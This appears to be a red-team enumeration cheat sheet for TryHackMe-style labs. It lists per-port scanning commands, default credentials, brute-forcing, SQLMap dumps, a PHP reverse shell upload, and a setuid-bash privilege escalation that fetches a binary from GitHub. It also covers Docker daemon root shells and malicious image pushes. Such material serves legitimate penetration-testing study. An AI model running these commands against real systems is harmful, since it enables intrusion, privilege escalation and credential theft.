# Enumeration

## **Scans**

**Initial scan**

**Kali**

```
nmap -A $VICTIM
```

**Longer scan**

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

**Even longer scan**

**Kali**

```
nmap -sC -sV -p- $VICTIM
```

**Scan for vulnerabilities**

Replace the port list with the open ports found by the previous scans; `--script=vuln` runs every NSE script in the vuln category, so keep it to known-open ports to save time and noise.

**Kali**

```
nmap -p1,2,3,4 --script=vuln $VICTIM
```
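To avoid retyping ports, the following added example (not part of the original cheat sheet) parses a saved `-oN` nmap report into the comma-separated list the vuln scan takes and prints the resulting command. The report contents, file name and target IP are constructed for the demonstration; point it at your own output file.

```sh
#!/bin/sh
# Added example, not from the original cheat sheet: turn the open ports in a
# saved nmap report (-oN) into the comma-separated list that
# `nmap -p ... --script=vuln` expects, instead of retyping them by hand.

# Print the open ports in an nmap normal-output file as "21,22,80".
# Port lines look like:  22/tcp   open  ssh   OpenSSH 8.2p1
# Only state "open" counts: "filtered" and UDP "open|filtered" guesses are skipped.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { split($1, a, "/"); print a[1] }' "$1" \
        | sort -n -u \
        | paste -sd, -
}

# Assemble (but do not run) the follow-up vuln scan for the ports found.
# $VICTIM is the target variable used elsewhere on this page.
vuln_scan_command() {
    ports=$(open_ports "$1")
    if [ -z "$ports" ]; then
        echo "no open ports found in $1" >&2
        return 1
    fi
    printf 'nmap -p%s --script=vuln %s\n' "$ports" "${VICTIM:-\$VICTIM}"
}

# Constructed nmap -oN report for the demonstration; a real one comes from e.g.
#   nmap -sC -sV -p- -oN initial.nmap $VICTIM
sample_nmap_output() {
    cat <<'EOF'
# Nmap 7.94 scan initiated as: nmap -sC -sV -p- -oN initial.nmap 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.021s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE    SERVICE      VERSION
21/tcp    open     ftp          vsftpd 3.0.3
22/tcp    open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
80/tcp    open     http         Apache httpd 2.4.41
139/tcp   filtered netbios-ssn
445/tcp   open     microsoft-ds
EOF
}

demo() {
    report=$(mktemp)
    sample_nmap_output > "$report"
    echo "open ports: $(open_ports "$report")"
    vuln_scan_command "$report"
    rm -f "$report"
}

demo
```

Save the first scan with `-oN initial.nmap`, then `open_ports initial.nmap` gives the `-p` argument; the filtered 139/tcp in the sample is deliberately left out because a vuln script cannot reach it anyway.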

## **Ports**

## TCP/21 - **FTP**

### **Common Credentials**

#### Usernames

```
anonymous
admin
guest
```

#### Passwords

```
anonymous
password
guest
```

### Access FTP

**Kali**

```
ftp $VICTIM 21
```

### List files

**Kali(ftp)**

```
ls
```

#### List files (using Curl)

**Kali**

```
curl ftp://anonymous:anonymous@$VICTIM:21/   # trailing slash requests a directory listing rather than a file
```

### Download  files

Switch to binary mode and passive mode before transferring. Binary matters for anything that is not plain text (images, executables); passive mode has the client open the data connection, which avoids a firewall blocking the server's connection back to you.

**Kali(ftp)**

```
binary
passive
```

**Kali(ftp)**

```
get $fileName.txt
```

#### Download all files

**Kali(ftp)**

```
mget *
```

#### Download all files to the current directory (using Wget)

**Kali**

```
wget -m ftp://anonymous:anonymous@$VICTIM:21 -nd
```

### Upload files

If the host also serves a website and the FTP directory you can write to is the web root, upload a web shell (or a reverse shell such as the one below) and request it from the browser to trigger it.

**Kali(ftp)**

```
binary
passive
put php-reverse-shell.php
```

## **TCP/22 - SSH**

### SSH into host

**Kali**

```
ssh $USERNAME@$VICTIM

#SSH into non-standard port
ssh $USERNAME@$VICTIM -p2222
```

### Check this page for cracking examples

[Credential Gathering & Cracking](/red-team/methodologies-and-resources/cheat-sheets/credential-gathering-and-cracking.md#ssh)

## **TCP/25 - SMTP**

**Kali**

```
telnet $VICTIM 25
HELO kali       # HELO requires a hostname argument; any name will do
VRFY root       # 250/252 = account exists, 550 = unknown user
QUIT
```

**Kali**

```
sudo nmap $VICTIM -p25 --script smtp-commands 
```

**Kali**

```
# quoted so the shell does not brace-expand the method list into separate arguments
sudo nmap $VICTIM -p25 --script smtp-enum-users --script-args "smtp-enum-users.methods={VRFY,EXPN,RCPT}"
```

**Kali**

```
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $VICTIM
```

### Check for vulnerabilities

**Kali**

```
sudo nmap $VICTIM -p25 --script "smtp-vuln*"
```

### Check this page for cracking examples

[Credential Gathering & Cracking](/red-team/methodologies-and-resources/cheat-sheets/credential-gathering-and-cracking.md#smtp)

## **UDP/53 - DNS**

### Find subdomains via zone transfer (AXFR)

**Example**

[Enumeration](/red-team/walkthroughs/tryhackme/enumeration.md#dns-smb-and-snmp)

[Hip Flask](/red-team/walkthroughs/tryhackme/hip-flask.md#udp-53-dns)

**Kali**

```
# a full zone dump means transfers are unrestricted; "Transfer failed" or a timeout means they are not
dig -t AXFR $HOST.thm @$DNSSERVER
```


## **TCP/80:443 - HTTP(s)**

### Web Enumeration

Useful info on how to run a lot of the tools in this section.

[Web Enumeration](/red-team/walkthroughs/tryhackme/web-enumeration.md)

### Information gathering

Check whether any paths are listed:

```
http://$VICTIM/robots.txt
http://$VICTIM/sitemap.xml
```

On HTTPS, read hostnames from the certificate's subject and SAN fields, then add them to `/etc/hosts` so virtual hosts resolve.

**Examples**

[Spring](/red-team/walkthroughs/tryhackme/spring.md)

<figure><img src="/files/pW393ZrRzUn8lzEPxHST" alt=""><figcaption></figcaption></figure>

### Create wordlist

Build a password wordlist from the words on the target's own site (`-m 8` keeps only words of at least eight characters).

**Examples**

[Password Attacks](/red-team/walkthroughs/tryhackme/password-attacks.md)

**Kali**

```
cewl -m 8 -w $LIST.lst https://$VICTIM 
```

### Find Directories

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
```

**Kali**

```
dirb http://$VICTIM/
dirb http://$VICTIM:$PORT/
dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt -z10 
```

### Find Pages

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

**Kali**

```
gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -l
```

**Kali**

```
ffuf -u http://$VICTIM/static/FUZZ -w /usr/share/dirb/wordlists/big.txt
```

**Kali**

```
dirsearch -u $VICTIM:$PORT 
```

### Find pages with certain extensions

**Examples**

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#find-pages-with-certain-extensions)

**Kali**

```
head /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt  
```

**web-extensions.txt**

```
.asp
.aspx
.bat
.c
.cfm
.cgi
.css
.com
.dll
.exe
```

**Kali**

```
ffuf -u http://$VICTIM/indexFUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt  
```

### Find pages and exclude certain extensions

**Example**

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#find-pages-and-exclude-certain-extensions)

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-
```

### Using filters

**Example**

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#using-filters)

By adding `-fc 403` (filter code) we'll hide from the output all 403 HTTP status codes.

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403
```

Use `-mc 200` (match code) instead of having a long list of filtered codes.

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200
```

`-fr` (filter regexp) hides results matching the expression; here it drops files beginning with a dot (`.htaccess` and friends):

**Kali**

```
ffuf -u http://$VICTIM/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fr '/\..*'
```

### Fuzzing parameters

**Example**

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#fuzzing-parameters)

Because ffuf accepts the `FUZZ` keyword anywhere in the request, the same wordlist can be used to discover parameter names:

**Kali**

```
# -c colourises output; -fw 39 hides responses with the baseline word count (39 here; read yours off a request with a bogus parameter)
ffuf -u http://$VICTIM/sqli-labs/Less-1/?FUZZ=1 -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
```

### Find Vulnerabilities

Nikto Tuning (-T) Options

```
0 – File Upload
1 – Interesting File / Seen in logs
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – Injection (XSS/Script/HTML)
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Remote File Retrieval – Server Wide
8 – Command Execution / Remote Shell
9 – SQL Injection
a – Authentication Bypass
b – Software Identification
c – Remote Source Inclusion
x – Reverse Tuning Options (i.e., include all except specified)
```

#### Scan for misconfigurations

```
# -Format only applies to a saved report, so pair it with -o
nikto -h $VICTIM -T 2 -Format txt -o $OUTFILE
```

#### Scan for SQL injection vulnerabilities.

```
nikto -h $VICTIM -T 9 -Format txt -o $OUTFILE
```

#### Authenticated nikto scan

**Examples**

[ToolsRus](/red-team/walkthroughs/tryhackme/toolsrus.md)

**Kali**

```
nikto -id $USERNAME:$PASSWORD -h http://$VICTIM:80/manager/html
```

#### Check for Shellshock

```
nmap -p 80 $VICTIM --script http-shellshock 
```

#### **Check for  Heartbleed**

```
nmap -p 443  $VICTIM --script ssl-heartbleed
```

### Fuzzing Subdomains

**Example**

[CMesS](/red-team/walkthroughs/tryhackme/cmess.md#fuzzing-domains)

**Kali**

```
# -f also writes results to a file; the URL needs double quotes so $URL expands
wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://$URL.thm/" -H "Host: FUZZ.$URL.thm" > results.txt

# drop the baseline response (290 words here; use the word count every miss returns, or pass --hw 290 to wfuzz)
grep -v '290 W' results.txt
```

**Example**

[VulnNet](/red-team/walkthroughs/tryhackme/vulnnet.md#fuzz-subdomain)

**Kali**

```
gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://$URL.thm  
```

**Example**

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#finding-vhosts-and-subdomains)

**Kali**

```
# resolves FUZZ.$URL.thm through DNS; for name-based vhosts on one IP fuzz the Host header instead: -u http://$URL.thm -H "Host: FUZZ.$URL.thm"
ffuf -u http://FUZZ.$URL.thm -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```

### Proxifying ffuf traffic

Example

[ffuf](/red-team/walkthroughs/tryhackme/ffuf.md#proxifying-ffuf-traffic)

**Kali**

```
ffuf -u http://$VICTIM -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x http://127.0.0.1:8080
```

It's also possible to send only matches to your proxy for replaying:

**Kali**

```
ffuf -u http://$VICTIM  -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -replay-proxy http://127.0.0.1:8080
```

### SQLMap

#### Get information

Can be used to get things like usernames and passwords or other information in the tables.

**Example**

[The Cod Caper](/red-team/walkthroughs/tryhackme/the-cod-caper.md#sql)

[Expose](/red-team/walkthroughs/tryhackme/expose.md)

**Kali**

```
# let sqlmap find and test the forms on the page, then dump what it can reach
sqlmap -u http://$VICTIM/$PAGE.php --forms --dump

# or replay a request saved from Burp, naming the backend to skip fingerprinting
sqlmap -r request.txt --dbms=mysql --dump
```

#### **Get Databases**

**Examples**

[Olympus](/red-team/walkthroughs/tryhackme/olympus.md)

[Gallery](/red-team/walkthroughs/tryhackme/gallery.md)

First capture the request of the page with Burp

**Kali**

```
sudo sqlmap -r request.req --dbs
```

Get tables

**Kali**

```
# -D selects the database to enumerate; --current-db only prints the name of the one in use
sudo sqlmap -r request.req -D $DATABASE --tables
```

Get fields for specified table

**Kali**

```
sudo sqlmap -r request.req -D $DATABASE -T $TABLE --columns
```

Get values of specific fields

**Kali**

```
# the column list is comma-separated with no spaces
sudo sqlmap -r request.req -D $DATABASE -T $TABLE -C $FIELD1,$FIELD2 --dump
```

#### **Rescan SQLMap**

sqlmap resumes from its saved session, so repeating the same command returns the cached result even after the target has changed. Delete the session directory (or pass `--flush-session`) to start over.

**Kali**

```
# root/legacy layout; newer sqlmap versions keep sessions under ~/.local/share/sqlmap/output/
rm -rf /root/.sqlmap/output/$HOST.thm/
```

## Cookies

**Example**

[Avengers Blog](/red-team/walkthroughs/tryhackme/avengers-blog.md#cookies)

Get the flag with developer console by checking the cookie.

<figure><img src="/files/Ce3JfXaZGGORRpkmi4n1" alt=""><figcaption></figcaption></figure>

## HTTP Headers

**Example**

[Avengers Blog](/red-team/walkthroughs/tryhackme/avengers-blog.md#http-headers)

<figure><img src="/files/4NJ9J2B6Q8mRS3cvVEiz" alt=""><figcaption></figcaption></figure>

### Run Web server

#### Kali

```
python3 -m http.server 81
# legacy Python 2 equivalent
python2 -m SimpleHTTPServer 81
```

### Wordpress

#### Scan wordpress site

**Examples**

[Retro](/red-team/walkthroughs/tryhackme/retro.md)

#### Kali

```
# HTTP
wpscan --url http://$VICTIM

# HTTPS (skip certificate validation for self-signed certificates)
wpscan --url https://$VICTIM --disable-tls-checks
```

#### Enumerate wordpress site

**Examples**

[Retro](/red-team/walkthroughs/tryhackme/retro.md)

[Wordpress: CVE-2021-29447](/red-team/walkthroughs/tryhackme/wordpress-cve-2021-29447.md)

#### Kali

```
wpscan --url http://$VICTIM -e p,t,u   # p = popular plugins, t = popular themes, u = users
```

#### Bruteforce admin page

#### Kali

```
# -U names the account to attack; without it wpscan enumerates users first and tries them all
wpscan --url http://$VICTIM -U $USERNAME --passwords /usr/share/wordlists/rockyou.txt
```

### .git folder found

**Examples**

[Spring](/red-team/walkthroughs/tryhackme/spring.md#gitdumper)

**Kali**

```
pip install git-dumper
mkdir git
git-dumper https://$VICTIM/sources/new/.git/ git/
cd git
git log

grep -r pass *
```

## Jenkins

#### Reverse Shell

**Examples**

[Internal](/red-team/walkthroughs/tryhackme/internal.md#jenkins-web)

## UDP/88 - Kerberos

### Username Enumeration

Finds valid users

**Examples**

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)

```
# -d is the AD domain/realm (from the DC certificate or nmap's kerberos/ldap output); one username per line
kerbrute/dist/kerbrute_linux_386 userenum --dc=$VICTIM -d=$commonName $ListOfUsernames.txt
```

### Get Ticket

**Examples**

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)

Accounts without Kerberos pre-authentication return Kerberos 5 AS-REP etype 23 hashes (`$krb5asrep$23$...`), which hashcat cracks with `-m 18200` and john with the `krb5asrep` format.

```
# the target is written as DOMAIN/ with a trailing slash; -format hashcat (or john) shapes the output for the cracker
python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip $VICTIM -format hashcat $commonName/
```

## **TCP/110 - POP3**

### Logging in with credentials

**Examples**

[Fowsniff CTF](/red-team/walkthroughs/tryhackme/fowsniff-ctf.md#tcp-110-pop3)

```
telnet $VICTIM 110
USER root
PASS root
LIST          # message numbers and sizes
RETR 1        # change the number for each message listed
QUIT
```

### Check this page for cracking examples

[Credential Gathering & Cracking](/red-team/methodologies-and-resources/cheat-sheets/credential-gathering-and-cracking.md#pop3)

## **TCP/135 - RPC**

**Kali**

```
# rpcclient (and psexec below) speak MS-RPC over SMB named pipes on TCP/445; 135 is only the endpoint mapper
rpcclient -U '' -N $VICTIM     # -N: no password prompt (null session)
srvinfo
netshareenum                   # share names with their on-disk paths; handy for locating a writable web root
```

### **Login with credentials**

**Examples**

[Gatekeeper](/red-team/walkthroughs/tryhackme/gatekeeper.md)

**Kali**

```
# on Kali the packaged wrapper is impacket-psexec; the path below is a local build
python3.9 /opt/impacket/build/scripts-3.9/psexec.py $USER@$VICTIM
Password: $PASSWORD
```


## **TCP/139 - NetBIOS**

**Examples**

[Basic Pentesting](/red-team/walkthroughs/tryhackme/basic-pentesting.md#smb-port-139)

### **Enumerate SMB**

**Kali**

```
nmap $VICTIM --script="smb-enum*"
```

**Examples**

[Gatekeeper](/red-team/walkthroughs/tryhackme/gatekeeper.md)

[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md)

**Kali**

```
nbtscan $VICTIM
```

**Examples**

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)

**Kali**

```
enum4linux $VICTIM
```

## **UDP/161 - SNMP**

### **Collect Information**

**Examples**

[Enumeration](/red-team/walkthroughs/tryhackme/enumeration.md#dns-smb-and-snmp)

**Kali**

```
# Kali also ships this tool as the snmp-check package; the steps below build it from source
git clone https://gitlab.com/kalilinux/packages/snmpcheck.git
cd snmpcheck/
gem install snmp
chmod +x snmpcheck-1.9.rb
./snmpcheck-1.9.rb $VICTIM -c $COMMUNITYSTRING   # community string is usually "public" unless found otherwise
```

## **TCP/389 - LDAP**

### Enumerating Active Directory

**Examples**

[Enumerating Active Directory](/red-team/walkthroughs/tryhackme/enumerating-active-directory.md)

### Breaching Active Directory

**Examples**

[Breaching Active Directory](/red-team/walkthroughs/tryhackme/breaching-active-directory.md)

### Exploiting Active Directory

**Examples**

[Exploiting Active Directory](/red-team/walkthroughs/tryhackme/exploiting-active-directory.md)

### Persisting Active Directory

**Examples**

[Persisting Active Directory](/red-team/walkthroughs/tryhackme/persisting-active-directory.md)

## **TCP/445  - SMB**

### Scanning

**Examples**

[Basic Pentesting](/red-team/walkthroughs/tryhackme/basic-pentesting.md)

**Kali**

```
nmap $VICTIM --script="smb-enum*"
```

### **Common Credentials**

#### Usernames

```
anonymous
admin
guest
```

Try each as the login when listing shares:

**Kali**

```
smbclient -L //$VICTIM/ -U $USERNAME
```

### **List Shares**

**Option #1**

**Examples**

[Gatekeeper](/red-team/walkthroughs/tryhackme/gatekeeper.md)

[Attacktive Directory](/red-team/walkthroughs/tryhackme/attacktive-directory.md)

[Basic Pentesting](/red-team/walkthroughs/tryhackme/basic-pentesting.md)

**Kali**

```
smbclient -L //$VICTIM/ 

# List shares on a non-standard SMB/Samba port
smbclient -L //$VICTIM/ -p $PORT 
```

**Option #2**

**Examples**

[Enumeration](/red-team/walkthroughs/tryhackme/enumeration.md#dns-smb-and-snmp)

**Victim**

```
net share
```

### Download files

#### Option #1

**Kali**

```
smbclient \\\\$VICTIM\\$SHARE
recurse ON      # descend into subdirectories
prompt          # turn off the per-file confirmation
mget *
```

#### Option #2

**Kali**

```
smbmap -H $VICTIM                         # shares and your permissions on each
smbmap -H $VICTIM -P $PORT                # non-standard port
smbmap -H $VICTIM -R $SHARE               # recursive listing of one share
smbmap -H $VICTIM --download "$SHARE\\$FILE"
```

#### Option #3

**Kali**

```
smbget -R smb://$VICTIM/$SHARE

# Download recursively from a non-standard SMB/Samba port
smbget -R smb://$VICTIM:$PORT/$SHARE
```

### Upload files

#### Option #1

**Kali**

```
smbclient \\\\$VICTIM\\$SHARE
put $FILE
```

### Detect Vulnerabilities

```
# Check if vulnerable to EternalBlue
sudo nmap $VICTIM -p445 --script smb-vuln-ms17-010 
```

```
# Check if vulnerable to SambaCry
sudo nmap $VICTIM -p445 --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version
```

## **TCP/6667 - IRC**

```
irssi -c $VICTIM -p $PORT   # 6667 is the usual plaintext port, 6697 the TLS one
```

## **TCP/873 - RSYNC**

### **Check Modules**

```
sudo nmap $VICTIM -p873 --script rsync-list-modules
```

### **List files**

**Example**

[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md#tcp-873-rsync)

```
rsync --list-only rsync://$VICTIM 
rsync --list-only rsync://$USERNAME@$VICTIM/$FOLDER
Password: $PASSWORD
```

### **Transfer files**

**Example**

[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md#tcp-873-rsync)

```
# trailing slash: copy into the .ssh directory rather than to a file named .ssh
rsync authorized_keys rsync://$USERNAME@$VICTIM/$FOLDER/.ssh/
Password: $PASSWORD
```

## **TCP/2049 - NFS**

```
# rpcbind on 111 advertises NFS; the nfs-* scripts (nfs-showmount, nfs-ls, nfs-statfs) list exports and their contents
sudo nmap $VICTIM -p111 --script "nfs*"
```

### Mount drive

**Examples**

[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md)

```
# List exported directories
showmount -e $VICTIM
# Make a mount point
sudo mkdir -p /mnt/nfs
# /opt/conf is just an example: use a path from the showmount output
sudo mount -t nfs $VICTIM:/opt/conf /mnt/nfs
cd /mnt/nfs
```

**Upload an SSH public key (id_rsa.pub) via rsync to log in**

```
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub authorized_keys
# trailing slash so the file lands inside .ssh/
rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh/
Password: pass

ssh $USERNAME@$VICTIM
```

**Create mount**

```
sudo mkdir -p /mnt/FOO
# -o nolock avoids needing the lock manager; $SHARE is an export path from showmount
sudo mount -t nfs -o nolock $VICTIM:$SHARE /mnt/FOO
```

**Interesting loot to look for**

```
- id_rsa from users' home directories
```

**Privilege Escalation**

Example of how to get a root shell when the export is mounted with `no_root_squash`. Everything except the last command runs on our Kali machine, where we are root and therefore control ownership and mode bits on the share; the final command runs on the target as the low-privileged user we already have.

```
# Download a bash binary that matches the target's architecture and libc (the one below is used in the linked room)
wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash

# Copy it onto the mounted export, make it root-owned and setuid
sudo mv bash /mount/point/
sudo chown root:root /mount/point/bash
sudo chmod 4755 /mount/point/bash

# SSH in as the victim user and run it; -p stops bash from dropping the effective uid
/mount/point/bash -p
```

## **TCP/3306 - MySQL**

**examples**

[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md#tcp-3306-mysql)

```
# no space after -p; double quotes so the variable expands
mysql -u $USER -h $VICTIM -p"$PASSWORD"
```

**Kali(mysql)**

```
show databases;
use $DATABASE;
show tables;
select * from $TABLE;
```

## **TCP/3389 - RDP**

### **Scan**

**Kali**

```
sudo nmap $VICTIM -p3389 --script rdp-ntlm-info 
```

### **Login to host**

**Kali**

```
rdesktop -u $USERNAME $VICTIM
```

**Kali**

```
remmina
```

**Examples**

[Retro](/red-team/walkthroughs/tryhackme/retro.md)

[Blaster](/red-team/walkthroughs/tryhackme/blaster.md)

**Kali**

```
xfreerdp /u:$USERNAME /p:$PASSWORD /cert:ignore /v:$VICTIM /workarea  +clipboard
```

**Kali**

```
xfreerdp +clipboard /u:"$USERNAME" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: $PASSWORD 
```

## **TCP/5000 - Docker Registry**

### **Add repositories**

**Example**

[The Great Escape](/red-team/walkthroughs/tryhackme/the-great-escape.md)

[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md)

**Kali**

```
# root-owned file; any editor will do
sudoedit /etc/docker/daemon.json
```

**daemon.json**

```
{
  "insecure-registries" : ["$VICTIM:5000"]
}
```

**Kali**

```
sudo systemctl restart docker
```

### **List repositories**

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md)

[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md#tcp-5000-docker-registry)

**Kali**

```
curl -s http://$VICTIM:5000/v2/_catalog
```

### **Get tags of a repository**

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md)

[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md#tcp-5000-docker-registry)

**Kali**

```
curl -s http://$VICTIM:5000/v2/$REPOSITORY/tags/list
```

### **Get manifests**

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md)

[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md#tcp-5000-docker-registry)

The manifest's layer history embeds the image config, including build-time environment variables, so credentials baked in with `ENV` often show up here:

**Kali**

```
curl -s http://$VICTIM:5000/v2/$REPOSITORY/manifests/latest
```
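The following added example (not code from the original page or from the Docker project) greps a saved manifest for environment variables whose names suggest credentials. It assumes the manifest was saved to a file with the curl command above; the manifest and config-blob contents, the `webapp` repository name and the secrets inside them are all constructed. It goes slightly beyond the page: besides the schema-1 manifest, whose `history[].v1Compatibility` strings carry the config with escaped quotes, it also handles the unescaped `Env` array in a schema-2 image config blob (`/v2/$REPOSITORY/blobs/$DIGEST`, where `$DIGEST` is the manifest's `config.digest`).

```sh
#!/bin/sh
# Added example, not from the original cheat sheet: find credential-looking
# environment variables in a Docker registry manifest or image config blob.

# Print NAME=value for every Env entry whose name contains PASS, SECRET, TOKEN or KEY.
# The value ends at the next quote or backslash, so it works whether the JSON is
# plain ("DB_PASSWORD=x") or escaped inside a v1Compatibility string (\"DB_PASSWORD=x\").
manifest_secrets() {
    grep -oE '[A-Za-z0-9_]*(PASS|SECRET|TOKEN|KEY)[A-Za-z0-9_]*=[^"\\]+' "$1" | sort -u
}

# Print every Env entry regardless of name, for secrets with bland names.
# First isolate the Env array (with or without escaped quotes), then split out NAME=value pairs.
manifest_env() {
    grep -oE '\\?"Env\\?":\[[^]]*\]' "$1" \
        | grep -oE '[A-Za-z_][A-Za-z0-9_]*=[^"\\]+' \
        | sort -u
}

# Constructed schema-1 manifest as returned by /v2/<name>/manifests/<tag> to a
# client without an Accept header. The config JSON is escaped inside a string.
sample_manifest() {
    cat <<'EOF'
{
   "schemaVersion": 1,
   "name": "webapp",
   "tag": "latest",
   "architecture": "amd64",
   "fsLayers": [
      { "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" }
   ],
   "history": [
      {
         "v1Compatibility": "{\"id\":\"c0ffee\",\"container_config\":{\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin\",\"DB_USER=app\",\"DB_PASSWORD=Sup3rS3cret!\",\"API_TOKEN=tok_9f8e7d\"],\"Cmd\":[\"node\",\"server.js\"]}}"
      }
   ]
}
EOF
}

# Constructed schema-2 image config blob (/v2/<name>/blobs/<config.digest>); here Env is plain JSON.
sample_config_blob() {
    cat <<'EOF'
{"architecture":"amd64","config":{"Env":["PATH=/usr/local/sbin:/usr/local/bin","ADMIN_KEY=abc123"],"Cmd":["sh"]},"rootfs":{"type":"layers"}}
EOF
}

demo() {
    m=$(mktemp); sample_manifest > "$m"
    echo "credential-looking Env entries in the manifest:"
    manifest_secrets "$m"
    echo "all Env entries in the manifest:"
    manifest_env "$m"
    rm -f "$m"
}

demo
```

Run it as `manifest_secrets manifest.json` on the output of the curl command; `Env` only covers what was set with `ENV` or `ARG` at build time, so still pull the image and inspect its layers (next section) for files such as `.env` or config files.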

### Download the Docker image to find info

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#download-the-docker-image-we-are-going-to-decompile-using)

**Kali**

```
docker pull $VICTIM:5000/$REPOSITORY
docker images
dive $IMAGE_ID
```

### Run an image against an exposed Docker daemon

**Example**

[The Great Escape](/red-team/walkthroughs/tryhackme/the-great-escape.md)

**Kali**

```
# -H talks to the Docker daemon API (2375 is its default plaintext port; use the one your scan found), not the registry on 5000
docker -H $VICTIM:2375 images
# mount the host's / into the container and chroot into it: a root shell on the Docker host
docker -H $VICTIM:2375 run -v /:/mnt --rm -it $REPOSITORY chroot /mnt sh
```

## Uploading Malicious Docker Images

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#vulnerability-3-uploading-malicious-docker-images)

**Kali**

```
# pull the existing image, rebuild it with your payload (Dockerfile below), then push it back under the same tag
docker pull $VICTIM:5000/$REPOSITORY
docker build -t $VICTIM:5000/$REPOSITORY:latest .
docker push $VICTIM:5000/$REPOSITORY:latest
```

**Docker file example**

<figure><img src="/files/fqKFTst7eShqqAqgotuL" alt=""><figcaption></figcaption></figure>

## RCE via Exposed Docker Daemon

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#vulnerability-4-rce-via-exposed-docker-daemon)

## Escape via Exposed Docker Daemon

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#vulnerability-5-escape-via-exposed-docker-daemon)

## Shared Namespaces

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#vulnerability-6-shared-namespaces)

## Misconfigured Privileges

**Example**

[The Docker Rodeo](/red-team/walkthroughs/tryhackme/the-docker-rodeo.md#vulnerability-7-misconfigured-privileges-deploy-2)

## Privilege Escalation with 2 shells and host mount

**Example**

[Umbrella](/red-team/walkthroughs/tryhackme/umbrella.md#privilege-escalation-with-2-shells-and-host-mount)

If you are **root inside a container** that has a host directory mounted into it, and you also have a shell on the **host as an unprivileged user** who can read that directory, copy bash into the mounted directory from the container, make it root-owned and setuid, then execute it from the host with `-p` to get root there.

**Victim(root)**

```
find / -name "$FILE-BOTH-USERS-CAN-ACCESS"
cd /$FOLDER
cp /bin/bash . 
chown root:root bash
chmod 4777 bash
```

**Victim(claire-r)**

```
find / -name "$FILE-BOTH-USERS-CAN-ACCESS"
cd /$FOLDER-FROM-BEFORE-MIGHT-BE-DIFF-LOCATION
./bash -p 
```

## **TCP/5432 - Postgres**

```
# default port is 5432; the default credentials postgres:postgres are worth a try
psql -U postgres -p $PORT -h $VICTIM
SELECT pg_ls_dir('/');    -- lists the server's filesystem; superuser by default
```

## **TCP/5985 - WinRM (HTTP)**

